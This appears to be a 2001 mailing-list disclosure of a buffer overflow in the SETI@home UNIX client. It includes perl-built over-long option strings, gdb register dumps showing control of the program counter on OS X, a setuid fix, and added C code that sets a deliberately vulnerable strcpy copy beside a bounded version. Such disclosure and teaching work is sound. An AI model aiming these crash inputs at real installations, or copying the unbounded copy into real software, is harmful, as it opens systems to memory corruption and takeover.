Also, in Joe's post he did not show an EIP overwrite, but on OS X we are
able to overwrite the PC register.
Starting program: /Users/elguapo/./setiathome-3.03.powerpc-
apple.1/setiathome -socks_user `perl -e 'print "A" x 9000'`
[Switching to thread 1 (process 612 thread 0x1907)]
Program received signal EXC_BAD_ACCESS, Could not access memory.
0x41414140 in ?? ()
(gdb) i r
r0 0x278c 10124
r1 0xbfffd670 3221214832
r2 0x3021c 197148
r3 0x16250 90704
r4 0x201 513
r5 0x1a4 420
r6 0x400 1024
r7 0x2e 46
r8 0x170 368
r9 0x3 3
r10 0x53 83
r11 0x2cbc4 183236
r12 0x41414141 1094795585
r13 0x0 0
r14 0x0 0
r15 0x0 0
r16 0x0 0
r17 0x0 0
r18 0x0 0
r19 0x0 0
r20 0x0 0
r21 0x3 3
r22 0x0 0
r23 0x1 1
r24 0xffffffff 4294967295
r25 0x0 0
r26 0x0 0
r27 0x1 1
r28 0xbfffd7e0 3221215200
r29 0x0 0
r30 0x0 0
r31 0x2774 10100
pc 0x41414140 1094795584
ps 0x4000f030 1073803312
cr 0x22000284 570425988
lr 0x278c 10124
ctr 0x41414141 1094795585
xer 0x20 32
mq 0x0 0
fpscr 0x0 0
vrsave 0x0 0
-KF
On Sunday, December 2, 2001, at 03:15 PM, joetesta_at_hushmail.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI@home
>
>
>
> Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project
> that
> allows ordinary citizens to participate in the search for extraterrestrial
> intelligence using their computer's idle time. A buffer overflow exists
> in the UNIX client software.
>
> NOTE: this vulnerability is NOT exploitable in the default
> installation.
>
>
>
> Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow. Example:
>
>
> # ./setiathome -version
> SETI@home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root_at_seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and
> you are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax 0x0 0
> ecx 0x40404040 1077952576
> edx 0x41414141 1094795585
> ebx 0xfefefeff -16843009
> esp 0x7fffe664 0x7fffe664
> ebp 0x7fffe6bc 0x7fffe6bc
> esi 0x7ffffe28 2147483176
> edi 0x807bffd 134725629
> eip 0x2ab4d409 0x2ab4d409
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f 895
> fstat 0x0 0
> ftag 0xffff 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop 0x0 0
>
>
>
> Solution
>
> The SETI@home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome'
> account --
> remove it immediately.
>
>
>
> Vendor Status
>
> The project director, Dr. Dave P. Anderson, was contacted via
> <davea_at_ssl.berkeley.edu> on Monday, Nov 5th. He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
> - Joe Testa
>
> e-mail: joetesta_at_hushmail.com
> web page: http://hogs.rit.edu/~joet/
> AIM: LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----
>
>
Received on Dec 03 2001
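The bug class in the advisory above (a command-line option copied with strcpy into a fixed-size buffer, so an over-long -socks_server/-socks_user/-socks_passwd value runs past the end of it) is shown below beside a bounded replacement. This is an added example written for this page; it is not the SETI@home client's source and not code from Joe Testa or KF. The 256-byte field size, the socks_config struct and the function names are assumptions chosen for illustration; the real client's buffer sizes are not given in the advisory.

```c
/* Added example: unbounded option copy (the advisory's bug class) next to a
 * bounded version. Illustrative code, not the SETI@home client's source.
 * SOCKS_FIELD_MAX, the struct layout and all function names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SOCKS_FIELD_MAX 256   /* assumed capacity; the real client's is unknown */

struct socks_config {
    char server[SOCKS_FIELD_MAX];
    char user[SOCKS_FIELD_MAX];
    char passwd[SOCKS_FIELD_MAX];
};

/* Vulnerable pattern: no length check at all. A value longer than the field
 * overwrites whatever sits after it (adjacent fields, saved registers, a
 * return address, or on PPC a saved LR/CTR value, as in KF's register dump).
 * Kept only for contrast; never call it on attacker-controlled input. */
void set_socks_field_unbounded(char *field, const char *value)
{
    strcpy(field, value);
}

/* Bounded replacement: reject anything that does not fit with its terminator,
 * copy exactly that many bytes, and the result is always NUL-terminated. */
int set_socks_field(char *field, size_t cap, const char *value)
{
    size_t len = strlen(value);
    if (len >= cap)
        return -1;            /* caller reports "option too long" and exits */
    memcpy(field, value, len + 1);
    return 0;
}

/* Parse "-socks_server X", "-socks_user X", "-socks_passwd X" pairs from argv.
 * Returns 0 on success, -1 if a value is over-long or its argument is missing.
 * Unrelated options are skipped so the example can run beside real flags. */
int parse_socks_options(int argc, char **argv, struct socks_config *cfg)
{
    memset(cfg, 0, sizeof *cfg);
    for (int i = 1; i < argc; i++) {
        char *field = NULL;
        if (strcmp(argv[i], "-socks_server") == 0)      field = cfg->server;
        else if (strcmp(argv[i], "-socks_user") == 0)   field = cfg->user;
        else if (strcmp(argv[i], "-socks_passwd") == 0) field = cfg->passwd;
        else continue;
        if (i + 1 >= argc)
            return -1;
        if (set_socks_field(field, SOCKS_FIELD_MAX, argv[++i]) != 0)
            return -1;
    }
    return 0;
}

/* Constructed test input: n bytes of 'A', the same thing the advisory builds
 * with perl -e 'print "A" x n'. Caller frees the result. */
char *make_filler(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    struct socks_config cfg;
    if (parse_socks_options(argc, argv, &cfg) != 0) {
        fprintf(stderr, "socks option too long or missing (limit %d bytes)\n",
                SOCKS_FIELD_MAX - 1);
        return 1;
    }
    printf("server=%s user=%s\n", cfg.server, cfg.user);
    return 0;
}
```

Run as `./a.out -socks_user $(perl -e 'print "A" x 5344')` and the bounded parser exits with an error where the strcpy version would have corrupted memory; the same check is what the advisory's "fixed in the next release" has to amount to, independent of whether the binary is setuid.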